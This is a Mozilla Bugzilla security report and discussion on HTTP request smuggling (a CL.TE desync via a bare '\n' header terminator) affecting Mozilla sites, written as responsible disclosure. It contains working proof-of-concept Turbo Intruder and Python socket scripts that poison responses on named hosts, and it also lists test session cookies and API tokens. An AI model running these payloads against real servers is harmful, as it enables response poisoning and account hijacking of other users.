HTTP Request Smuggling across Mozilla web infrastructure
Categories
(Websites :: Other, task)
Tracking
(Not tracked)
People
(Reporter: albinowax, Unassigned)
References
Details
(Keywords: reporter-external, sec-high, wsec-http-header-inject, Whiteboard: please talk to claudijd before unhiding)
Attachments
(4 files)
Hi,
The technique used in this report is part of ongoing research pending publication at Black Hat in August. Please don't share or publish it in the meantime. In particular, please don't make this bug public without my consent like you did with my last report.
I've found that a substantial portion of Mozilla's web infrastructure is vulnerable to HTTP request smuggling. This can typically be used by attackers to hijack arbitrary user accounts with zero-user interaction - it's roughly equivalent to persistent XSS on every page.
This vulnerability occurs because the backend servers regard
Foo: bar\nTransfer-Encoding: chunked
as two separate headers, whereas the frontends regard it as one header and therefore use the content-length header instead. This means it's possible to send an ambiguous request which gets interpreted differently by each of the two servers and desynchronizes them, leading to TCP socket poisoning.
A cursory scan indicates that this issue potentially affects the following domains:
bugzilla.mozilla.org, support.mozilla.org, addons.mozilla.org, thimble.mozilla.org, science.mozilla.org, discource.mozilla.org, donate.mozilla.org, download.mozilla.org, crash-stats.mozilla.org, sql.telemetry.mozilla.org, http-observatory.security.mozilla.org, symbolapi.mozilla.org, click.e.mozilla.org, symbols.mozilla.org, missioncontrol.telemetry.mozilla.org, learning.mozilla.org, elmo.services.mozilla.com, crash-stats.mozilla.com, webextensions.settings.services.mozilla.com, phabricator.services.mozilla.com, testpilot.r53-2.mozilla.com, testpilot.settings.services.mozilla.com, color.r53-2.services.mozilla.com, search.r53-2.services.mozilla.com
For obvious reasons I haven't bothered to try and exploit every one of these services. Instead, I've focused on bugzilla.mozilla.org as an example critical target.
To avoid affecting real users we'll target bugzilla-dev.allizom.org. To easily replicate the core issue, run the following script in turbo intruder:
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint='https://bugzilla-dev.allizom.org:443',
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0
)
engine.start()
attack = '''POST /home HTTP/1.1
Fooz: bar
Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Foo: bar
0
GET /robots.txt HTTP/1.1
X-Ignore: X'''
victim = '''POST /index.cgi HTTP/1.1
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bugzilla-dev.allizom.org/home
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Connection: close
Cookie: Bugzilla_login_request_cookie=2lcwXqRJq6; github_secret=faEb99ZsQriC3xBH1PETUck6KZWTmly7DxnsqRJperIpet9H6zGyGX7d4kMddULJJO5cA9hVfulDOL1Zajv9u1Ap7COolDpPUVeJafOyqRWDq6eyyFAneUwYoHjey2h2f4fTqFhiBcs5NZVCoJgerziuRqc1UfrZe6vzee30mMCeU2K3FShhgZWtK8qgzRHfGX0E3DksxPLyevRuNVSiLNfSPJTEiFDSyc31EInyHF4GShmpUCQD99pLGkr4PIZE
Upgrade-Insecure-Requests: 1
Bugzilla_login=test%40example.com&Bugzilla_password=cow&Bugzilla_remember=on&Bugzilla_login_token=&GoAheadAndLogIn=Log+in'''
for i in range(14):
engine.queue(victim)
time.sleep(0.1)
def handleResponse(req, interesting):
table.add(req)
You should observe that one of the 'victim' login requests gets the robots.txt response, thanks to the smuggled request inside the attack. This response will potentially get served up to any active user.
By amending the smuggled request, the attacker can make the response content originate from a malicious bug attachment, and effectively gain the ability to serve malicious HTML/JavaScript to everyone using the application. This is a quite fiddly - I'll provide the steps in a followup comment.
Updated•6 years ago
|
Updated•6 years ago
|
Updated•6 years ago
|
Updated•6 years ago
|
| Reporter | ||
Comment 1•6 years ago
•
|
||
Here's a script I successfully used to demonstrate causing an arbitrary response:
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint='https://bugzilla-dev.allizom.org:443',
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0
)
engine.start()
attack = '''POST /home HTTP/1.1
Fooz: bar
Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9; VERSION-Firefox=1.5.0.x%20Branch
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 767
Foo: bar
0
POST /attachment.cgi?id=9155360&t=zUM7YAZi5WW38hKjoYI8D8 HTTP/1.1
Host: bug1395564.bmoattachments.bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bugzilla-dev.allizom.org/show_bug.cgi?id=1395564
X-Forwarded-Host: cow.com
X-Requested-With: XMLHttpRequest
X-Forwarded-For: 81.139.39.150
X-Forwarded-Port: 443
X-Forwarded-Proto: https
Connection: close
Cookie: Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9; VERSION-Firefox=1.5.0.x%20Branch
Content-Type: application/x-www-form-urlencoded
Content-Length: 740
Bugzilla_api_token=hkvtOvKDAeEDu5txHfUPBo&text=foobar'''
victim = '''POST /home HTTP/1.1
Fooz: bar
Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9; VERSION-Firefox=1.5.0.x%20Branch
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Foo: bar
0
'''
# The request engine will auto-fix the content-length for us
attack = target.req + prefix
engine.queue(attack)
victim = target.req
for i in range(14):
engine.queue(victim)
time.sleep(0.05)
def handleResponse(req, interesting):
table.add(req)
You should see that one victim POST request to bugzilla-dev.allizom.org gets the contents of the attachment. To make this PoC work for you, you'll need to create a bug, create a malicious attachment, and update the URL and Host header in the smuggled request to contain your attachment ID, bug ID, and attachment token. Please note that the attachment token is either single use or expires very quickly.
| Reporter | ||
Comment 2•6 years ago
|
||
There's a few ways to resolve this issue:
- Make the frontend system normalise requests (I think nginx does a pretty good job at this)
- Make the frontend reject requests containing '\n' in a header value.
- Make the backend reject chunked requests that contain a Content-Length header (and close the connection afterwards)
- Disable connection-reuse between the front-end and backend (this may have a serious performance impact)
- Exclusively use HTTP/2 between the front-end and backend
Comment 3•6 years ago
|
||
It seems to me that the root of the problem is that the frontend follows RFC2616 (CR LF as a header delimiter) but the backend does not.
Are there open bugs with any HTTP serving software and libraries about this?
| Reporter | ||
Comment 4•6 years ago
|
||
I don't know about open bugs, but here's some related fixed issues in Pound: https://regilero.github.io/english/security/2018/07/03/security_pound_http_smuggling/
Comment 5•6 years ago
|
||
Note this is related to bug 1546698.
Or rather, bug 1546698 because of the same underlying problem.
Comment 6•6 years ago
|
||
Hi James, I'm having problems reproducing this with your scripts.
The fist one seems to return the same responses every time without the contents of robots.txt and the second one fails:
Error launching attack - bad python?
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "<string>", line 70, in queueRequests
NameError: global name 'prefix' is not defined
at org.python.core.Py.NameError(Py.java:284)
at org.python.core.PyFrame.getglobal(PyFrame.java:265)
Any suggestions?
thanks
Comment 7•6 years ago
|
||
Hah, I submitted the exact same comment at the exact same time as Simon. I am also having the same problem.
| Reporter | ||
Comment 8•6 years ago
|
||
You're right, the PoC script is busted. Sorry, I'll have to get it fixed on monday. That's what I get for rushing to have the report ready by the end of the week.
| Reporter | ||
Comment 9•6 years ago
|
||
*Tuesday; it's a bank holiday monday. Sorry!
| Reporter | ||
Updated•6 years ago
|
Comment 10•6 years ago
|
||
(In reply to Jаmes Kettle from comment #2)
There's a few ways to resolve this issue:
- Make the backend reject chunked requests that contain a Content-Length header (and close the connection afterwards)
The backend forbids this combination, but it is being added by either the ELB or nginx.
Comment 11•6 years ago
|
||
No problem, we'll put things on hold for now. You said that it potentially affects http-observatory.security.mozilla.org - if you'd be able to replicate there, that would make things a lot easier than on BMO (which has a lot of moving pieces).
https://github.com/mozilla/http-observatory/blob/master/httpobs/docs/api.md
Is the API, but some really simple endpoints to use are:
https://http-observatory.security.mozilla.org/__version__
https://http-observatory.security.mozilla.org/contribute.json
https://http-observatory.security.mozilla.org/__lbheartbeat__
Thanks!
Is it possible that this is an outgrowth of the already known bad-behavior of ELB's wrt chunked encoding?
"If the client cancels an HTTP request that was initiated with a Transfer-Encoding: chunked header, there is a known issue where the load balancer forwards the request to the instance even though the client canceled the request. This can cause backend errors."
https://docs.aws.amazon.com/elasticloadbalancing/latest/classic/ts-elb-http-errors.html
Comment 13•6 years ago
|
||
This is really weird.
I added Content-Length to bugzilla-dev.allizom.org (not all requests set a length before this change)
But then I don't see that content length, I see 4245.
So I added X-Bugzilla-Content-Length.
Now I see two flavors of responses:
X-Bugzilla-Content-Length: 13213
transfer-encoding: chunked
and
X-Bugzilla-Content-Length: 13213
Content-Length: 4245
What does 4245 mean? Where does it come from?
Comment 14•6 years ago
|
||
These are the headers before they get sent to nginx or the ELB
Comment 15•6 years ago
|
||
variant 1 of the mangled headers
Comment 16•6 years ago
|
||
Comment 17•6 years ago
|
||
Comment 18•6 years ago
|
||
These examples are indicating to me that gzip is at fault.
I wager 4245 what 13213 compresses to.
I further wager the randomness is related to load?
If the gzip takes slightly longer, nginx does chunked?
Comment 19•6 years ago
|
||
Ok. nginx itself is removing the content-length in all cases. Sometimes the ELB is adding it back.
With the request
GET / HTTP/1.1
User-Agent: curl/7.29.0
Accept: */*
Accept-Encoding: gzip
Host: bugzilla-dev.allizom.org
X-Forwarded-Proto: https
X-Forwarded-For: 127.0.0.1
The response is always
HTTP/1.1 200 OK
Date: Fri, 24 May 2019 23:32:05 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: public, max-age=3600, immutable
Strict-Transport-Security: max-age=31536000; includeSubDomains
Referrer-policy: same-origin
X-frame-options: SAMEORIGIN
X-xss-protection: 1; mode=block
X-content-type-options: nosniff
Content-Security-Policy: default-src 'self'; worker-src 'none'; connect-src 'self' https://product-details.mozilla.org https://www.google-analytics.com https://treeherder.mozilla.org/api/failurecount/ https://crash-stats.mozilla.org/api/SuperSearch/; font-src 'self' https://fonts.gstatic.com; img-src 'self' data: blob: https://secure.gravatar.com; object-src 'none'; script-src 'self' 'nonce-CBHl7aif3p5ilARJOlccPjrZlTTnBL1gOlysLrUUimpe0RrN' 'unsafe-inline' https://www.google-analytics.com; style-src 'self' 'unsafe-inline'; frame-src https://crash-stop-addon.herokuapp.com; frame-ancestors 'self'; form-action 'self' https://www.google.com/search https://github.com/login/oauth/authorize https://github.com/login
Content-Encoding: gzip
I'm not certain why the ELB sometimes adds a Content-length, but when it does -- that seems to be when things get confused.
Comment 20•6 years ago
|
||
Until we can make the ELBs not be dumb, I think we should turn off gzip compression.
| Reporter | ||
Comment 21•6 years ago
|
||
OK, here's a PoC script that actually works. It issues two victim requests, followed by an attack request, followed by two more victim requests. All the victim requests are identical, but you should be able to observe that the attack changes the response to one of the victim requests from the expected JSON to the HTML homepage.
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint='https://bugzilla-dev.allizom.org:443',
concurrentConnections=1,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0
)
engine.start()
attack = '''POST /home HTTP/1.1
Fooz: bar'''+'\n'+'''Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Foo: bar
0
GET / HTTP/1.1
X-Ignore: X'''
victim = '''POST /rest/bug_user_last_visit/1395564?Bugzilla_api_token=U7E8I7xDuUdWDC3GOku5dh HTTP/1.1
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bugzilla-dev.allizom.org/show_bug.cgi?id=1395564
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: VERSION-Firefox=1.5.0.x%20Branch; Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9
Content-Length: 0
'''
engine.queue(victim)
engine.queue(victim)
engine.queue(attack)
engine.queue(victim)
engine.queue(victim)
def handleResponse(req, interesting):
table.add(req)
| Reporter | ||
Comment 22•6 years ago
|
||
And here's the attack script that demonstrates causing an arbitrary HTML response. The key thing about this response is that it gets served from https://bugzilla-dev.allizom.org/ so that's where the browser thinks it comes from, even though it really originates from bug1395570.bmoattachments.bugzilla-dev.allizom.org
I've switched to using an attachment on a public bug so you don't need to edit it yourself:
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint='https://bugzilla-dev.allizom.org:443',
concurrentConnections=1,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0
)
engine.start()
attack = '''POST /home HTTP/1.1
Fooz: bar'''+'\n'+'''Transfer-Encoding: chunked
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Foo: bar
0
POST /attachment.cgi?id=9155367 HTTP/1.1
Host: bug1395570.bmoattachments.bugzilla-dev.allizom.org
X-Forwarded-For: 81.139.39.150
X-Forwarded-Port: 443
X-Forwarded-Proto: https
Referer: https://bugzilla-dev.allizom.org/show_bug.cgi?id=1395564
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
foo=bar&x='''
victim = '''POST /rest/bug_user_last_visit/1395564?Bugzilla_api_token=U7E8I7xDuUdWDC3GOku5dh HTTP/1.1
Host: bugzilla-dev.allizom.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bugzilla-dev.allizom.org/show_bug.cgi?id=1395564
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: VERSION-Firefox=1.5.0.x%20Branch; Bugzilla_login=454982; Bugzilla_logincookie=Ix3NYbZBCJ1YPtzvxi24s9
Content-Length: 0
'''
engine.queue(victim)
engine.queue(victim)
engine.queue(attack)
engine.queue(victim)
engine.queue(victim)
def handleResponse(req, interesting):
table.add(req)
Comment 23•6 years ago
|
||
Thanks James,
I can confirm that when running this script I can see '<script>alert(document.domain)</script>' in the first victim response after the attack request.
| Reporter | ||
Comment 24•6 years ago
|
||
As requested, here's another script demonstrating the same issue on http-observatory.security.mozilla.org. Hope that makes life easier for you:
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint='https://http-observatory.security.mozilla.org:443',
concurrentConnections=1,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0
)
engine.start()
attack = '''POST / HTTP/1.1
Fooz: bar'''+'\n'+'''Transfer-Encoding: chunked
Host: http-observatory.security.mozilla.org
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Foo: bar
0
GET /__version__ HTTP/1.1
X-Ignore: X'''
victim = '''GET / HTTP/1.1
Host: http-observatory.security.mozilla.org
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
'''
engine.queue(attack)
for i in range(14):
engine.queue(victim)
time.sleep(0.05)
def handleResponse(req, interesting):
table.add(req)
Comment 25•6 years ago
•
|
||
I've been trying to reproduce this issue against https://api.accounts.firefox.com, and while I haven't been able to reproduce the "response poisoning" effect shown on other properties above, I've seen enough to be concerned.
The FxA backend servers are all arranged like [ELB] -> [nginx] -> [nodejs app]. I don't have access to prod or stage, but went onto one of our development boxes and ran the following script directly against nginx:
import socket
# This is where nginx listens for requests from the ELB.
sock = socket.create_connection(("localhost", 1443))
sock.sendall(
#
# An initial request, checking status of an account that
# does exist. It should respond with `{"exists": true}`.
# Note that the "Fooz" header ends with "\n"
# rather than "\r\n", but nginx will accept that as a
# seperate header. It will ignore the Content-Length header
# and process this as a chunked encoding request body.
#
b'POST /auth/v1/account/status HTTP/1.1\r\n'
b'Fooz: Bar\n'
b'Transfer-Encoding: chunked\r\n'
b'Host: latest.dev.lcip.org\r\n'
b'Content-Type: text/json\r\n'
b'Connection: keep-alive\r\n'
b'Content-Length: 305\r\n'
b'\r\n'
b'1A\r\n'
b'{"email":"ryan@rfk.id.au"}\r\n'
b'0\r\n'
b'\r\n'
#
# A second request, pipelined over the same socket.
# This one is pretty ordinary and well-formed, and
# is for an account that does not exist. It should
# respond with `{"exists": false}`
#
b'POST /auth/v1/account/status HTTP/1.1\r\n'
b'Host: latest.dev.lcip.org\r\n'
b'Connection: keep-alive\r\n'
b'Content-Type: text/json\r\n'
b'Content-Length: 26\r\n'
b'\r\n'
b'{"email":"jeff@rfk.id.au"}'
#
# A third request, again checking an account that does exist.
# There's nothing unusual about this one. It should respond
# with `{"exists": false}`
#
b'POST /auth/v1/account/status HTTP/1.1\r\n'
b'Host: latest.dev.lcip.org\r\n'
b'Connection: close\r\n'
b'Content-Type: text/json\r\n'
b'Content-Length: 26\r\n'
b'\r\n'
b'{"email":"ryan@rfk.id.au"}'
)
print(sock.recv(4096))
print(sock.recv(4096))
print(sock.recv(4096))
Nginx interpreted this sequence of bytes as three separate requests, forwarding each to the app and returning three correct responses of {"exists": true}, {"exists": false}, and {"exists": true}. It would be better if it returned an error about the missing \r in the first request, but this is apparently allowed by the HTTP/1.1 spec.
Next I tried a similar sequence of bytes against the ELB in our stage environment. I don't have good visibility into exactly what's happening inside the ELB, but here's the script I used and my annotations about why it's being weird based on the description from this bug report:
import socket
import ssl
context = ssl.create_default_context()
host = "api-accounts.stage.mozaws.net"
sock = socket.create_connection((host, 443))
sock = context.wrap_socket(sock, server_hostname=host)
sock.sendall(
#
# An initial request, checking status of an account that
# does exist. It should respond with `{"exists": true}`
#
# Note that the "Fooz" header ends with "\n" rather than "\r\n".
# The ELB will not recognize this as a header terminator, and will
# instead treat these two lines as a single header:
#
# "Fooz" -> "Bar\nTransfer-Encoding chunked".
#
b'POST /v1/account/status HTTP/1.1\r\n'
b'Fooz: Bar\n'
b'Transfer-Encoding: chunked\r\n' # <-- The ELB doesn't see this header.
b'Host: api-accounts.stage.mozaws.net\r\n'
b'Content-Type: text/json\r\n'
b'Connection: keep-alive\r\n'
b'Content-Length: 205\r\n' # <-- So the ELB reads this content length
b'\r\n' # and thinks all this is one big request...
b'1A\r\n' # <---------------------------------------+
b'{"email":"ryan@rfk.id.au"}\r\n'
b'0\r\n'
b'\r\n'
#
# A second request, pipelined over the same socket.
# This one is pretty ordinary and well-formed, and
# is for a n account that does not exist. It should
# respond with `{"exists": false}`
#
b'POST /v1/account/status HTTP/1.1\r\n'
b'Host: api-accounts.stage.mozaws.net\r\n'
b'Connection: keep-alive\r\n'
b'Content-Type: text/json\r\n'
b'Content-Length: 26\r\n'
b'\r\n' # ...all the way down to here!
b'{"email":"jeff@rfk.id.au"}' # <---------------------------------------+
#
# A third request, again checking an account that does exist.
# There's nothing unusual about this one. It should respond
# with `{"exists": false}`
#
b'POST /v1/account/status HTTP/1.1\r\n'
b'Host: api-accounts.stage.mozaws.net\r\n'
b'Connection: close\r\n'
b'Content-Type: text/json\r\n'
b'Content-Length: 26\r\n'
b'\r\n'
b'{"email":"ryan@rfk.id.au"}'
)
print(sock.recv(4096))
print(sock.recv(4096))
print(sock.recv(4096))
If you execute this script, it will behave as though it made two requests to the application, returning two responses of {"exists": true} and {"exists": true}. The middle request, the one that's supposed to return {"exists": false}, has completely vanished!
You can confirm that it's the ELB that is behaving incorrectly here by:
- Adjusting the "Fooz" header to end in a proper
\r\nsequence. This will cause the bytes to be interpreted as three proper requests, just like nginx does in the previous test. - Adjusting the first "Content-Length" header to be something other than "205". This will cause the script to return two responses, one successful and the second a
400 Bad Request, presumably because the ELB truncates the bytes at a place that makes for an unintelligible request through to nginx.
So the big question for me is....what happened to the bytes from that middle request? The ELB slurped them off the wire, but did it forward them to nginx and through to the app? Did the app return the expected response, and if so where did it go? :jbuck, perhaps you could try running the above script against stage, and monitor the nginx logs to see whether it is indeed getting through to the app as three separate well-formed requests?
If the ELB could be tricked into returning those response bytes to some other user, a variety of Very Bad Things would be possible. Given the successful response poisoning from Comment 22 and friends, I have to assume this would be possible on FxA as well, unless we can prove otherwise.
Updated•6 years ago
|
| Reporter | ||
Comment 26•6 years ago
|
||
I think you already know this but just so nobody is taken by surprise: I'm going to publicly disclose the BMO vulnerability on August 7th.
It would be great if it was patched by then.
| Reporter | ||
Comment 27•6 years ago
|
||
This vulnerability has now been disclosed here https://portswigger.net/blog/http-desync-attacks-request-smuggling-reborn
Comment 28•6 years ago
|
||
James: Thanks again for your report and your excellent research here. To the best of my understanding Amazon has applied a global fix to this issue. I'm closing this issue as resolved, and if there are other spot corner cases that come up, we can deal with those in separate bugs.
Updated•6 years ago
|
Comment 29•6 years ago
|
||
James: We've awarded a bounty on this report, you'll hear from us shortly with details. Thanks again!
Updated•5 years ago
|
Updated•3 years ago
|
Updated•1 year ago
|
Description
•